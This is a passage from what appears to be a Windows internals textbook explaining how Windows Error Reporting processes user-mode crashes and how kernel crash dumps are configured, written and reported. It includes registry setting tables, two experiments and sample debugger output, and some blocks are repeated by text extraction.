acquired. The WER service is a direct triggered-start service, which is started by the SCM only in case
the WER_SERVICE_START WNF state is updated or in case an event is written in a dummy WER activa-
tion ETW provider (named Microsoft-Windows-Feedback-Service-Triggerprovider). WerpReportFault
538
CHAPTER 10 Management, diagnostics, and tracing
updates the relative WNF state and waits on the \KernelObjects\SystemErrorPortReady event, which is
signaled by the WER service to indicate that it is ready to accept new connections. After a connection
has been established, Ntdll connects to the WER service’s \WindowsErrorReportingServicePort ALPC
port, sends the WERSVC_REPORT_CRASH message, and waits indefinitely for its reply.
The message allows the WER service to begin to analyze the crashed program’s state and performs
the appropriate actions to create a crash report. In most cases, this means launching the WerFault.exe
program. For user-mode crashes, the Windows Fault Reporting process is invoked two times using the
faulting process’s credentials. The first time is used to acquire a “snapshot” of the crashing process. This
feature was introduced in Windows 8.1 with the goal of rendering the crash report generation of UWP
applications (which, at that time, were all single-instance applications) faster. In that way, the user could
have restarted a crashed UWP application without waiting for the report being generated. (UWP and
the modern application stack are discussed in Chapter 8.)
Snapshot creation
WerFault maps the shared memory section containing the crash data and opens the faulting process
and thread. When invoked with the -pss command-line argument (used for requesting a process snap-
shot), it calls the PssNtCaptureSnapshot function exported by Ntdll. The latter uses native APIs to query
multiple information regarding the crashing process (like basic information, job information, process
times, secure mitigations, process file name, and shared user data section). Furthermore, the function
queries information regarding all the memory sections baked by a file and mapped in the entire user-
mode address space of the process. It then saves all the acquired data in a PSS_SNAPSHOT data struc-
ture representing a snapshot. It finally creates an identical copy of the entire VA space of the crashing
process into another dummy process (cloned process) using the NtCreateProcessEx API (providing a
special combination of flags). From now on, the original process can be terminated, and further opera-
tions needed for the report can be executed on the cloned process.
Note WER does not perform any snapshot creation for protected processes and trustlets.
In these cases, the report is generated by obtaining data from the original faulting process,
which is suspended and resumed only after the report is completed.
Crash report generation
After the snapshot is created, execution control returns to the WER service, which initializes the envi-
ronment for the crash report creation. This is done mainly in two ways:
I
If the crash happened to a normal, unprotected process, the WER service directly invokes the
WerpInitiateCrashReporting routine exported from the Windows User Mode Crash Reporting
DLL (Faultrep.dll).
I
Crashes belonging to protected processes need another broker process, which is spawned un-
der the SYSTEM account (and not the faulting process credentials). The broker performs some
verifications and calls the same routine used for crashes happening in normal processes.
CHAPTER 10 Management, diagnostics, and tracing
539
The WerpInitiateCrashReporting routine, when called from the WER service, prepares the environ-
ment for executing the correct Fault Reporting process. It uses APIs exported from the WER library to
initialize the machine store (which, in its default configuration, is located in C:\ProgramData\Microsoft\
Windows\WER) and load all the WER settings from the Windows registry. WER indeed contains many
customizable options that can be configured by the user through the Group Policy editor or by manu-
ally making changes to the registry. At this stage, WER impersonates the user that has started the fault-
ing application and starts the correct Fault Reporting process using the -u main command-line switch,
which indicates to the WerFault (or WerFaultSecure) to process the user crash and create a new report.
Note If the crashing process is a Modern application running under a low-integrity level
or AppContainer token, WER uses the User Manager service to generate a new medium-IL
token representing the user that has launched the faulting application.
Table 10-19 lists the WER registry configuration options, their use, and possible values. These values
are located under the HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting subkey for
computer configuration and in the equivalent path under HKEY_CURRENT_USER for per-user configu-
ration (some values can also be present in the \Software\Policies\Microsoft\Windows\Windows Error
Reporting key).
TABLE 10-19 WER registry settings
Settings
Meaning
Values
ConfigureArchive
Contents of archived data
1 for parameters, 2 for all data
ConsentDefaultConsent
What kind of data should require
consent
1 for any data, 2 for parameters only,
3 for parameters and safe data, 4 for
all data.
ConsentDefaultOverrideBehavior
Whether the DefaultConsent overrides
WER plug-in consent values
1 to enable override
ConsentPluginName
Consent value for a specific WER plug-in
Same as DefaultConsent
CorporateWERDirectory
Directory for a corporate WER store
String containing the path
CorporateWERPortNumber
Port to use for a corporate WER store
Port number
CorporateWERServer
Name to use for a corporate WER store
String containing the name
CorporateWERUseAuthentication
Use Windows Integrated Authentication
for corporate WER store
1 to enable built-in authentication
CorporateWERUseSSL
Use Secure Sockets Layer (SSL) for
corporate WER store
1 to enable SSL
DebugApplications
List of applications that require the user
to choose between Debug and Continue
1 to require the user to choose
DisableArchive
Whether the archive is enabled
1 to disable archive
Disabled
Whether WER is disabled
1 to disable WER
DisableQueue
Determines whether reports are to be
queued
1 to disable queue
DontShowUI
Disables or enables the WER UI
1 to disable UI
540
CHAPTER 10 Management, diagnostics, and tracing
Settings
Meaning
Values
DontSendAdditionalData
Prevents additional crash data from be-
ing sent
1 not to send
ExcludedApplicationsAppName
List of applications excluded from WER
String containing the application list
ForceQueue
Whether reports should be sent to the
user queue
1 to send reports to the queue
LocalDumpsDumpFolder
Path at which to store the dump files
String containing the path
LocalDumpsDumpCount
Maximum number of dump files in the
path
Count
LocalDumpsDumpType
Type of dump to generate during a crash
0 for a custom dump, 1 for a minidump, 2
for a full dump
LocalDumpsCustomDumpFlags
For custom dumps, specifies custom
options
Values defined in MINIDUMP_TYPE (see
Chapter 12 for more information)
LoggingDisabled
Enables or disables logging
1 to disable logging
MaxArchiveCount
Maximum size of the archive (in files)
Value between 1–5000
MaxQueueCount
Maximum size of the queue
Value between 1–500
QueuePesterInterval
Days between requests to have the user
check for solutions
Number of days
The Windows Fault Reporting process started with the -u switch starts the report generation:
the process maps again the shared memory section containing the crash data, identifies the exception’s
record and descriptor, and obtains the snapshot taken previously. In case the snapshot does not
exist, the WerFault process operates directly on the faulting process, which is suspended. WerFault
first determines the nature of the faulting process (service, native, standard, or shell process). If the
faulting process has asked the system not to report any hard errors (through the SetErrorMode API),
the entire process is aborted, and no report is created. Otherwise, WER checks whether a default
post-mortem debugger is enabled through settings stored in the AeDebug subkey (AeDebugProtected
for protected processes) under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ root
registry key. Table 10-20 describes the possible values of both keys.
TABLE 10-20 Valid registry values used for the AeDebug and AeDebugProtected root keys
Value name
Meaning
Data
Debugger
Specify the debugger executable to be
launched when an application crashes.
Full path of the debugger executable, with
eventual command-line arguments. The -p
switch is automatically added by WER, pointing
it to the crashing process ID.
ProtectedDebugger
Same as Debugger but for protected
processes only.
Full path of the debugger executable. Not valid
for the AeDebug key.
Auto
Specify the Autostartup mode
1 to enable the launching of the debugger in
any case, without any user consent, 0 other-
wise.
LaunchNonProtected
Specify whether the debugger should be ex-
ecuted as unprotected.
This setting applies only to the
AeDebugProtected key.
1 to launch the debugger as a standard
process.
CHAPTER 10 Management, diagnostics, and tracing
541
If the debugger start type is set to Auto, WER starts it and waits for a debugger event to be sig-
naled before continuing the report creation. The report generation is started through the internal
GenerateCrashReport routine implemented in the User Mode Crash Reporting DLL (Faultrep.dll).
The latter configures all the WER plug-ins and initializes the report using the WerReportCreate
API, exported from the WER.dll. (Note that at this stage, the report is only located in memory.) The
GenerateCrashReport routine calculates the report ID and a signature and adds further diagnostics
data to the report, like the process times and startup parameters or application-defined data. It then
checks the WER configuration to determine which kind of memory dump to create (by default, a
minidump is acquired). It then calls the exported WerReportAddDump API with the goal to initialize the
dump acquisition for the faulting process (it will be added to the final report). Note that if a snapshot
has been previously acquired, it is used for acquiring the dump.
The WerReportSubmit API, exported from WER.dll, is the central routine that generates the dump
of the faulting process, creates all the files included in the report, shows the UI (if configured to do so
by the DontShowUI registry value), and sends the report to the Online Crash server. The report usually
includes the following:
I
A minidump file of the crashing process (usually named memory.hdmp)
I
A human-readable text report, which includes exception information, the calculated signature
of the crash, OS information, a list of all the files associated with the report, and a list of all the
modules loaded in the crashing process (this file is usually named report.wer)
I
A CSV (comma separated values) file containing a list of all the active processes at the time of
the crash and basic information (like the number of threads, the private working set size, hard
fault count, and so on)
I
A text file containing the global memory status information
I
A text file containing application compatibility information
The Fault Reporting process communicates through ALPC to the WER service and sends commands
to allow the service to generate most of the information present in the report. After all the files have
been generated, if configured appropriately, the Windows Fault Reporting process presents a dialog
box (as shown in Figure 10-39) to the user, notifying that a critical error has occurred in the target
process. (This feature is disabled by default in Windows 10.)
FIGURE 10-39 The Windows Error Reporting dialog box.
542
CHAPTER 10 Management, diagnostics, and tracing
In environments where systems are not connected to the Internet or where the administrator wants
to control which error reports are submitted to Microsoft, the destination for the error report can
be configured to be an internal file server. The System Center Desktop Error Monitoring (part of the
Microsoft Desktop Optimization Pack) understands the directory structure created by Windows Error
Reporting and provides the administrator with the option to take selective error reports and submit
them to Microsoft.
As previously discussed, the WER service uses an ALPC port for communicating with crashed
processes. This mechanism uses a systemwide error port that the WER service registers through
NtSetInformationProcess (which uses DbgkRegisterErrorPort). As a result, all Windows processes have
an error port that is actually an ALPC port object registered by the WER service. The kernel and the
unhandled exception filter in Ntdll use this port to send a message to the WER service, which then
analyzes the crashing process. This means that even in severe cases of thread state damage, WER is still
able to receive notifications and launch WerFault.exe to log the detailed information of the critical er-
ror in a Windows Event log (or to display a user interface to the user) instead of having to do this work
within the crashing thread itself. This solves all the problems of silent process death: Users are notified,
debugging can occur, and service administrators can see the crash event.
EXPERIMENT: Enabling the WER user interface
Starting with the initial release of Windows 10, the user interface displayed by WER when an ap-
plication crashes has been disabled by default. This is primarily because of the introduction of the
Restart Manager (part of the Application Recovery and Restart technology). The latter allows ap-
plications to register a restart or recovery callback invoked when an application crashes, hangs,
or just needs to be restarted for servicing an update. As a result, classic applications that do
not register any recovery callback when they encounter an unhandled exception just terminate
without displaying any message to the user (but correctly logging the error in the system log).
As discussed in this section, WER supports a user interface, which can be enabled by just adding a
value in one of the WER keys used for storing settings. For this experiment, you will re-enable the
WER UI using the global system key.
From the book’s downloadable resources, copy the BuggedApp executable and run it. After
pressing a key, the application generates a critical unhandled exception that WER intercepts
and reports. In default configurations, no error message is displayed. The process is terminated,
an error event is stored in the system log, and the report is generated and sent without any
user intervention. Open the Registry Editor (by typing regedit in the Cortana search box) and
navigate to the HKLM\SOFTWARE\Microsoft\Windows \Windows Error Reporting registry key.
If the DontShowUI value does not exist, create it by right-clicking the root key and selecting New,
DWORD (32 bit) Value and assign 0 to it.
If you restart the bugged application and press a key, WER displays a user interface similar
to the one shown in Figure 10-39 before terminating the crashing application. You can repeat
the experiment by adding a debugger to the AeDebug key. Running Windbg with the -I switch
performs the registration automatically, as discussed in the “Witnessing a COM-hosted task”
experiment earlier in this chapter.
EXPERIMENT: Enabling the WER user interface
Starting with the initial release of Windows 10, the user interface displayed by WER when an ap-
plication crashes has been disabled by default. This is primarily because of the introduction of the
Restart Manager (part of the Application Recovery and Restart technology). The latter allows ap-
plications to register a restart or recovery callback invoked when an application crashes, hangs,
or just needs to be restarted for servicing an update. As a result, classic applications that do
not register any recovery callback when they encounter an unhandled exception just terminate
without displaying any message to the user (but correctly logging the error in the system log).
As discussed in this section, WER supports a user interface, which can be enabled by just adding a
value in one of the WER keys used for storing settings. For this experiment, you will re-enable the
WER UI using the global system key.
From the book’s downloadable resources, copy the BuggedApp executable and run it. After
pressing a key, the application generates a critical unhandled exception that WER intercepts
and reports. In default configurations, no error message is displayed. The process is terminated,
an error event is stored in the system log, and the report is generated and sent without any
user intervention. Open the Registry Editor (by typing regedit in the Cortana search box) and
navigate to the HKLM\SOFTWARE\Microsoft\Windows \Windows Error Reporting registry key.
If the DontShowUI value does not exist, create it by right-clicking the root key and selecting
DontShowUI value does not exist, create it by right-clicking the root key and selecting
DontShowUI
New,
DWORD (32 bit) Value and assign 0 to it.
If you restart the bugged application and press a key, WER displays a user interface similar
to the one shown in Figure 10-39 before terminating the crashing application. You can repeat
the experiment by adding a debugger to the AeDebug key. Running Windbg with the -I switch
performs the registration automatically, as discussed in the “Witnessing a COM-hosted task”
experiment earlier in this chapter.
CHAPTER 10 Management, diagnostics, and tracing
543
Kernel-mode (system) crashes
Before discussing how WER is involved when a kernel crashes, we need to introduce how the ker-
nel records crash information. By default, all Windows systems are configured to attempt to record
information about the state of the system before the Blue Screen of Death (BSOD) is displayed, and
the system is restarted. You can see these settings by opening the System Properties tool in Control
Panel (under System and Security, System, Advanced System Settings), clicking the Advanced tab,
and then clicking the Settings button under Startup and Recovery. The default settings for a Windows
system are shown in Figure 10-40.
FIGURE 10-40 Crash dump settings.
Crash dump files
Different levels of information can be recorded on a system crash:
I
Active memory dump An active memory dump contains all physical memory accessible and
in use by Windows at the time of the crash. This type of dump is a subset of the complete mem-
ory dump; it just filters out pages that are not relevant for troubleshooting problems on the
host machine. This dump type includes memory allocated to user-mode applications and active
pages mapped into the kernel or user space, as well as selected Pagefile-backed Transition,
Standby, and Modified pages such as the memory allocated with VirtualAlloc or page-file
backed sections. Active dumps do not include pages on the free and zeroed lists, the file cache,
guest VM pages, and various other types of memory that are not useful during debugging.
544
CHAPTER 10 Management, diagnostics, and tracing
I
Complete memory dump A complete memory dump is the largest kernel-mode dump file
that contains all the physical pages accessible by Windows. This type of dump is not fully sup-
ported on all platforms (the active memory dump superseded it). Windows requires that a page
file be at least the size of physical memory plus 1 MB for the header. Device drivers can add up
to 256 MB for secondary crash dump data, so to be safe, it’s recommended that you increase
the size of the page file by an additional 256 MB.
I
Kernel memory dump A kernel memory dump includes only the kernel-mode pages allo-
cated by the operating system, the HAL, and device drivers that are present in physical memory
at the time of the crash. This type of dump does not contain pages belonging to user processes.
Because only kernel-mode code can directly cause Windows to crash, however, it’s unlikely that
user process pages are necessary to debug a crash. In addition, all data structures relevant for
crash dump analysis—including the list of running processes, the kernel-mode stack of the cur-
rent thread, and list of loaded drivers—are stored in nonpaged memory that saves in a kernel
memory dump. There is no way to predict the size of a kernel memory dump because its size
depends on the amount of kernel-mode memory allocated by the operating system and drivers
present on the machine.
I
Automatic memory dump This is the default setting for both Windows client and server
systems. An automatic memory dump is similar to a kernel memory dump, but it also saves
some metadata of the active user-mode process (at the time of the crash). Furthermore, this
dump type allows better management of the system paging file’s size. Windows can set the size
of the paging file to less than the size of RAM but large enough to ensure that a kernel memory
dump can be captured most of the time.
I
Small memory dump A small memory dump, which is typically between 128 KB and 1 MB in
size and is also called a minidump or triage dump, contains the stop code and parameters, the
list of loaded device drivers, the data structures that describe the current process and thread
(called the EPROCESS and ETHREAD—described in Chapter 3 of Part 1), the kernel stack for the
thread that caused the crash, and additional memory considered potentially relevant by crash
dump heuristics, such as the pages referenced by processor registers that contain memory ad-
dresses and secondary dump data added by drivers.
Note Device drivers can register a secondary dump data callback routine by calling
KeRegisterBugCheckReasonCallback. The kernel invokes these callbacks after a crash and a
callback routine can add additional data to a crash dump file, such as device hardware mem-
ory or device information for easier debugging. Up to 256 MB can be added systemwide by
all drivers, depending on the space required to store the dump and the size of the file into
which the dump is written, and each callback can add at most one-eighth of the available
additional space. Once the additional space is consumed, drivers subsequently called are
not offered the chance to add data.
The debugger indicates that it has limited information available to it when it loads a minidump, and
basic commands like !process, which lists active processes, don’t have the data they need. A kernel
CHAPTER 10 Management, diagnostics, and tracing
545
memory dump includes more information, but switching to a different process’s address space map-
pings won’t work because required data isn’t in the dump file. While a complete memory dump is a
superset of the other options, it has the drawback that its size tracks the amount of physical memory on
a system and can therefore become unwieldy. Even though user-mode code and data usually are not
used during the analysis of most crashes, the active memory dump overcame the limitation by storing
in the dump only the memory that is actually used (excluding physical pages in the free and zeroed
list). As a result, it is possible to switch address space in an active memory dump.
An advantage of a minidump is its small size, which makes it convenient for exchange via email,
for example. In addition, each crash generates a file in the directory %SystemRoot%\Minidump with
a unique file name consisting of the date, the number of milliseconds that have elapsed since the
system was started, and a sequence number (for example, 040712-24835-01.dmp). If there's a conflict,
the system attempts to create additional unique file names by calling the Windows GetTickCount
function to return an updated system tick count, and it also increments the sequence number. By
default, Windows saves the last 50 minidumps. The number of minidumps saved is configurable
by modifying the MinidumpsCount value under the HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl registry key.
A significant disadvantage is that the limited amount of data stored in the dump can hamper effective
analysis. You can also get the advantages of minidumps even when you configure a system to generate
kernel, complete, active, or automatic crash dumps by opening the larger crash with WinDbg and using
the .dump /m command to extract a minidump. Note that a minidump is automatically created even if
the system is set for full or kernel dumps.
Note You can use the .dump command from within LiveKd to generate a memory image
of a live system that you can analyze offline without stopping the system. This approach is
useful when a system is exhibiting a problem but is still delivering services, and you want to
troubleshoot the problem without interrupting service. To prevent creating crash images
that aren’t necessarily fully consistent because the contents of different regions of memory
reflect different points in time, LiveKd supports the –m flag. The mirror dump option pro-
duces a consistent snapshot of kernel-mode memory by leveraging the memory manager’s
memory mirroring APIs, which give a point-in-time view of the system.
The kernel memory dump option offers a practical middle ground. Because it contains all kernel-
mode-owned physical memory, it has the same level of analysis-related data as a complete memory
dump, but it omits the usually irrelevant user-mode data and code, and therefore can be significantly
smaller. As an example, on a system running a 64-bit version of Windows with 4 GB of RAM, a kernel
memory dump was 294 MB in size.
When you configure kernel memory dumps, the system checks whether the paging file is large
enough, as described earlier. There isn’t a reliable way to predict the size of a kernel memory dump.
The reason you can’t predict the size of a kernel memory dump is that its size depends on the amount
of kernel-mode memory in use by the operating system and drivers present on the machine at the time
of the crash. Therefore, it is possible that at the time of the crash, the paging file is too small to hold a
546
CHAPTER 10 Management, diagnostics, and tracing
kernel dump, in which case the system will switch to generating a minidump. If you want to see the size
of a kernel dump on your system, force a manual crash either by configuring the registry option to al-
low you to initiate a manual system crash from the console (documented at https://docs.microsoft.com/
en-us/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard) or by using
the Notmyfault tool (https://docs.microsoft.com/en-us/sysinternals/downloads/notmyfault).
The automatic memory dump overcomes this limitation, though. The system will be indeed able
to create a paging file large enough to ensure that a kernel memory dump can be captured most of
the time. If the computer crashes and the paging file is not large enough to capture a kernel memory
dump, Windows increases the size of the paging file to at least the size of the physical RAM installed.
To limit the amount of disk space that is taken up by crash dumps, Windows needs to determine
whether it should maintain a copy of the last kernel or complete dump. After reporting the kernel
fault (described later), Windows uses the following algorithm to decide whether it should keep the
Memory.dmp file. If the system is a server, Windows always stores the dump file. On a Windows client
system, only domain-joined machines will always store a crash dump by default. For a non-domain-
joined machine, Windows maintains a copy of the crash dump only if there is more than 25 GB of
free disk space on the destination volume (4 GB on ARM64, configurable via the HKLM\SYSTEM\
CurrentControlSet\Control\CrashControl\PersistDumpDiskSpaceLimit registry value)—that is, the
volume where the system is configured to write the Memory.dmp file. If the system, due to disk space
constraints, is unable to keep a copy of the crash dump file, an event is written to the System event
log indicating that the dump file was deleted, as shown in Figure 10-41. This behavior can be overrid-
den by creating the DWORD registry value HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\
AlwaysKeepMemoryDump and setting it to 1, in which case Windows always keeps a crash dump,
regardless of the amount of free disk space.
FIGURE 10-41 Dump file deletion event log entry.
CHAPTER 10 Management, diagnostics, and tracing
547
EXPERIMENT: Viewing dump file information
Each crash dump file contains a dump header that describes the stop code and its parameters,
the type of system the crash occurred on (including version information), and a list of pointers
to important kernel-mode structures required during analysis. The dump header also contains
the type of crash dump that was written and any information specific to that type of dump. The
.dumpdebug debugger command can be used to display the dump header of a crash dump file.
For example, the following output is from a crash of a system that was configured for an auto-
matic dump:
0: kd> .dumpdebug
----- 64 bit Kernel Bitmap Dump Analysis - Kernel address space is available,
User address space may not be available.
DUMP_HEADER64:
MajorVersion 0000000f
MinorVersion 000047ba
KdSecondaryVersion 00000002
DirectoryTableBase 00000000`006d4000
PfnDataBase ffffe980`00000000
PsLoadedModuleList fffff800`5df00170
PsActiveProcessHead fffff800`5def0b60
MachineImageType 00008664
NumberProcessors 00000003
BugCheckCode
000000e2
BugCheckParameter1 00000000`00000000
BugCheckParameter2 00000000`00000000
BugCheckParameter3 00000000`00000000
BugCheckParameter4 00000000`00000000
KdDebuggerDataBlock fffff800`5dede5e0
SecondaryDataState 00000000
ProductType
00000001
SuiteMask
00000110
Attributes
00000000
BITMAP_DUMP:
DumpOptions
00000000
HeaderSize
16000
BitmapSize
9ba00
Pages
25dee
KiProcessorBlock at fffff800`5e02dac0
3 KiProcessorBlock entries:
fffff800`5c32f180 ffff8701`9f703180 ffff8701`9f3a0180
The .enumtag command displays all secondary dump data stored within a crash dump (as
shown below). For each callback of secondary data, the tag, the length of the data, and the data
itself (in byte and ASCII format) are displayed. Developers can use Debugger Extension APIs to
create custom debugger extensions to also read secondary dump data. (See the “Debugging
Tools for Windows” help file for more information.)
EXPERIMENT: Viewing dump file information
Each crash dump file contains a dump header that describes the stop code and its parameters,
the type of system the crash occurred on (including version information), and a list of pointers
to important kernel-mode structures required during analysis. The dump header also contains
the type of crash dump that was written and any information specific to that type of dump. The
.dumpdebug debugger command can be used to display the dump header of a crash dump file.
For example, the following output is from a crash of a system that was configured for an auto-
matic dump:
0: kd> .dumpdebug
----- 64 bit Kernel Bitmap Dump Analysis - Kernel address space is available,
User address space may not be available.
DUMP_HEADER64:
MajorVersion 0000000f
MinorVersion 000047ba
KdSecondaryVersion 00000002
DirectoryTableBase 00000000`006d4000
PfnDataBase ffffe980`00000000
PsLoadedModuleList fffff800`5df00170
PsActiveProcessHead fffff800`5def0b60
MachineImageType 00008664
NumberProcessors 00000003
BugCheckCode
000000e2
BugCheckParameter1 00000000`00000000
BugCheckParameter2 00000000`00000000
BugCheckParameter3 00000000`00000000
BugCheckParameter4 00000000`00000000
KdDebuggerDataBlock fffff800`5dede5e0
SecondaryDataState 00000000
ProductType
00000001
SuiteMask
00000110
Attributes
00000000
BITMAP_DUMP:
DumpOptions
00000000
HeaderSize
16000
BitmapSize
9ba00
Pages
25dee
KiProcessorBlock at fffff800`5e02dac0
3 KiProcessorBlock entries:
fffff800`5c32f180 ffff8701`9f703180 ffff8701`9f3a0180
The .enumtag command displays all secondary dump data stored within a crash dump (as
shown below). For each callback of secondary data, the tag, the length of the data, and the data
itself (in byte and ASCII format) are displayed. Developers can use Debugger Extension APIs to
create custom debugger extensions to also read secondary dump data. (See the “Debugging
Tools for Windows” help file for more information.)
548
CHAPTER 10 Management, diagnostics, and tracing
{E83B40D2-B0A0-4842-ABEA71C9E3463DD1} - 0x100 bytes
46 41 43 50 14 01 00 00 06 98 56 52 54 55 41 4C FACP......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
53 52 41 54 A0 01 00 00 02 C6 56 52 54 55 41 4C SRAT......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
57 41 45 54 28 00 00 00 01 22 56 52 54 55 41 4C WAET(...."VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
41 50 49 43 60 00 00 00 04 F7 56 52 54 55 41 4C APIC`.....VRTUAL
...
Crash dump generation
Phase 1 of the system boot process allows the I/O manager to check the configured crash dump op-
tions by reading the HKLM\SYSTEM\CurrentControlSet\Control\CrashControl registry key. If a dump
is configured, the I/O manager loads the crash dump driver (Crashdmp.sys) and calls its entry point.
The entry point transfers back to the I/O manager a table of control functions, which are used by the
I/O manager for interacting with the crash dump driver. The I/O manager also initializes the secure
encryption needed by the Secure Kernel to store the encrypted pages in the dump. One of the control
functions in the table initializes the global crash dump system. It gets the physical sectors (file extent)
where the page file is stored and the volume device object associated with it.
The global crash dump initialization function obtains the miniport driver that manages the physical
disk in which the page file is stored. It then uses the MmLoadSystemImageEx routine to make a copy
of the crash dump driver and the disk miniport driver, giving them their original names prefixed by the
dump_ string. Note that this implies also creating a copy of all the drivers imported by the miniport
driver, as shown in the Figure 10-42.
FIGURE 10-42 Kernel modules copied for use to generate and write a crash dump file.
{E83B40D2-B0A0-4842-ABEA71C9E3463DD1} - 0x100 bytes
46 41 43 50 14 01 00 00 06 98 56 52 54 55 41 4C FACP......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
53 52 41 54 A0 01 00 00 02 C6 56 52 54 55 41 4C SRAT......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
57 41 45 54 28 00 00 00 01 22 56 52 54 55 41 4C WAET(...."VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
41 50 49 43 60 00 00 00 04 F7 56 52 54 55 41 4C APIC`.....VRTUAL
...
CHAPTER 10 Management, diagnostics, and tracing
549
The system also queries the DumpFilters value for any filter drivers that are required for writing to
the volume, an example being Dumpfve.sys, the BitLocker Drive Encryption Crashdump Filter driver. It
also collects information related to the components involved with writing a crash dump—including the
name of the disk miniport driver, the I/O manager structures that are necessary to write the dump, and
the map of where the paging file is on disk—and saves two copies of the data in dump-context struc-
tures. The system is ready to generate and write a dump using a safe, noncorrupted path.
Indeed, when the system crashes, the crash dump driver (%SystemRoot%\System32\Drivers\
Crashdmp.sys) verifies the integrity of the two dump-context structures obtained at boot by perform-
ing a memory comparison. If there’s not a match, it does not write a crash dump because doing so
would likely fail or corrupt the disk. Upon a successful verification match, Crashdmp.sys, with sup-
port from the copied disk miniport driver and any required filter drivers, writes the dump information
directly to the sectors on disk occupied by the paging file, bypassing the file system driver and storage
driver stack (which might be corrupted or even have caused the crash).
Note Because the page file is opened early during system startup for crash dump use,
most crashes that are caused by bugs in system-start driver initialization result in a dump
file. Crashes in early Windows boot components such as the HAL or the initialization of boot
drivers occur too early for the system to have a page file, so using another computer to
debug the startup process is the only way to perform crash analysis in those cases.
During the boot process, the Session Manager (Smss.exe) checks the registry value HKLM\SYSTEM\
CurrentControlSet\Control\Session Manager\Memory Management\ExistingPageFiles for a list of ex-
isting page files from the previous boot. (See Chapter 5 of Part 1 for more information on page files.) It
then cycles through the list, calling the function SmpCheckForCrashDump on each file present, looking
to see whether it contains crash dump data. It checks by searching the header at the top of each paging
file for the signature PAGEDUMP or PAGEDU64 on 32-bit or 64-bit systems, respectively. (A match indi-
cates that the paging file contains crash dump information.) If crash dump data is present, the Session
Manager then reads a set of crash parameters from the HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl registry key, including the DumpFile value that contains the name of the target dump file
(typically %SystemRoot%\Memory.dmp, unless configured otherwise).
Smss.exe then checks whether the target dump file is on a different volume than the paging file.
If so, it checks whether the target volume has enough free disk space (the size required for the crash
dump is stored in the dump header of the page file) before truncating the paging file to the size of the
crash data and renaming it to a temporary dump file name. (A new page file will be created later when
the Session Manager calls the NtCreatePagingFile function.) The temporary dump file name takes the
format DUMPxxxx.tmp, where xxxx is the current low-word value of the system’s tick count (The system
attempts 100 times to find a nonconflicting value.) After renaming the page file, the system removes
both the hidden and system attributes from the file and sets the appropriate security descriptors to
secure the crash dump.
Next, the Session Manager creates the volatile registry key HKLM\SYSTEM\CurrentControlSet\
Control\CrashControl\MachineCrash and stores the temporary dump file name in the value DumpFile.
550
CHAPTER 10 Management, diagnostics, and tracing
It then writes a DWORD to the TempDestination value indicating whether the dump file location is only
a temporary destination. If the paging file is on the same volume as the destination dump file, a tempo-
rary dump file isn’t used because the paging file is truncated and directly renamed to the target dump
file name. In this case, the DumpFile value will be that of the target dump file, and TempDestination
will be 0.
Later in the boot, Wininit checks for the presence of the MachineCrash key, and if it exists, launches
the Windows Fault Reporting process (Werfault.exe) with the -k -c command-line switches (the k
flag indicates kernel error reporting, and the c flag indicates that the full or kernel dump should
be converted to a minidump). WerFault reads the TempDestination and DumpFile values. If the
TempDestination value is set to 1, which indicates a temporary file was used, WerFault moves the
temporary file to its target location and secures the target file by allowing only the System account
and the local Administrators group access. WerFault then writes the final dump file name to the
FinalDumpFileLocation value in the MachineCrash key. These steps are shown in Figure 10-43.
Session
Manager
Wininit
WerFault
4
1
2
5
6
7
“MachineCrash”
Memory.dmp
WerFault
3
SMSS
SmpCheckForCrashDump
Dumpxxxx.tmp
Paging file
FIGURE 10-43 Crash dump file generation.
To provide more control over where the dump file data is written to—for example, on systems
that boot from a SAN or systems with insufficient disk space on the volume where the paging file
is configured—Windows also supports the use of a dedicated dump file that is configured in the
DedicatedDumpFile and DumpFileSize values under the HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl registry key. When a dedicated dump file is specified, the crash dump driver creates
the dump file of the specified size and writes the crash data there instead of to the paging file. If no
DumpFileSize value is given, Windows creates a dedicated dump file using the largest file size that
would be required to store a complete dump. Windows calculates the required size as the size of the
total number of physical pages of memory present in the system plus the size required for the dump
header (one page on 32-bit systems, and two pages on 64-bit systems), plus the maximum value for
secondary crash dump data, which is 256 MB. If a full or kernel dump is configured but there is not
enough space on the target volume to create the dedicated dump file of the required size, the system
falls back to writing a minidump.
CHAPTER 10 Management, diagnostics, and tracing
551
Kernel reports
After the WerFault process is started by Wininit and has correctly generated the final dump file,
WerFault generates the report to send to the Microsoft Online Crash Analysis site (or, if configured,
an internal error reporting server). Generating a report for a kernel crash is a procedure that involves
the following:
1.
If the type of dump generated was not a minidump, it extracts a minidump from the dump file and
stores it in the default location of %SystemRoot%\Minidump, unless otherwise configured through
the MinidumpDir value in the HKLM\SYSTEM\CurrentControlSet\Control\CrashControl key.
2.
It writes the name of the minidump files to HKLM\SOFTWARE\Microsoft\Windows\Windows
Error Reporting\KernelFaults\Queue.
3.
It adds a command to execute WerFault.exe (%SystemRoot%\System32\WerFault.exe) with the
–k –rq flags (the rq flag specifies to use queued reporting mode and that WerFault should be
restarted) to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce so that WerFault
is executed during the first user’s logon to the system for purposes of actually sending the
error report.
When the WerFault utility executes during logon, as a result of having configured itself to start, it
launches itself again using the –k –q flags (the q flag on its own specifies queued reporting mode) and
terminates the previous instance. It does this to prevent the Windows shell from waiting on WerFault
by returning control to RunOnce as quickly as possible. The newly launched WerFault.exe checks the
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\KernelFaults\Queue key to look
for queued reports that may have been added in the previous dump conversion phase. It also checks
whether there are previously unsent crash reports from previous sessions. If there are, WerFault.exe
generates two XML-formatted files:
I
